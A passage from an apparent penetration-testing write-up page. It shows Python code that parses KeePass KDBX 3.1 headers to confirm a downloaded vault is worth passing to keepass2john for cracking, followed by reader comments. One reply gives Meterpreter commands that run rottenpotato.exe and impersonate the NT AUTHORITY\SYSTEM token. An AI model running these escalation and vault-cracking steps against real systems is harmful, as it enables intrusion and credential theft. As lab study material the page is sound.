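            raise ValueError("header truncated at offset %d" % pos)
        field_id = data[pos]
        (length,) = struct.unpack("<H", data[pos + 1:pos + 3])
        pos += 3
        if field_id > MAX_FIELD_ID:
            raise ValueError("unknown header field id %d at offset %d" % (field_id, pos - 3))
        value = data[pos:pos + length]
        if len(value) != length:
            raise ValueError("field %d runs past the end of the data" % field_id)
        fields[field_id] = value
        pos += length
        if field_id == END_OF_HEADER:
            return fields


def kdbx_intact(data):
    """True when the outer header parses, i.e. the download is worth handing to keepass2john."""
    try:
        parse_kdbx3_header(data)
        return True
    except ValueError:
        return False


def ascii_mode_damage(data):
    """Simulate what an ASCII-mode FTP transfer does to a binary file: LF -> CRLF."""
    return data.replace(b"\n", b"\r\n")


def _field(field_id, value):
    return bytes([field_id]) + struct.pack("<H", len(value)) + value


# Constructed KDBX 3.1 header: signatures, version, and a few fields. The
# master seed is a made-up byte pattern that deliberately contains 0x0a.
SAMPLE_KDBX_HEADER = (
    struct.pack("<IIHH", KDBX_SIG1, KDBX_SIG2, 1, 3)
    + _field(2, bytes.fromhex("31c1f2e6bf714350be5805216afc5aff"))  # CipherID (AES-256)
    + _field(4, bytes(range(32)))                                     # MasterSeed
    + _field(10, b"\x02\x00\x00\x00")                                 # InnerRandomStreamID
    + _field(0, b"\r\n\r\n")                                          # EndOfHeader
)
```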

Hi, I am not able to get NT AUTHORITY\SYSTEM under “Impersonation Tokens Available” after executing rottenpotato.exe. I tried several times; what could be the reason?

That’s probably because you need to be fast: make sure you have the flags from execute -Hc -f C:\\Temp\\rottenpotato.exe and execute impersonate_token “NT AUTHORITY\SYSTEM” immediately after.

Hi, thanks for your writeup. I have tried your script. But it always failed at the last step: wait 60002 port to connect. It keeps timeout. I cannot figure out the reason.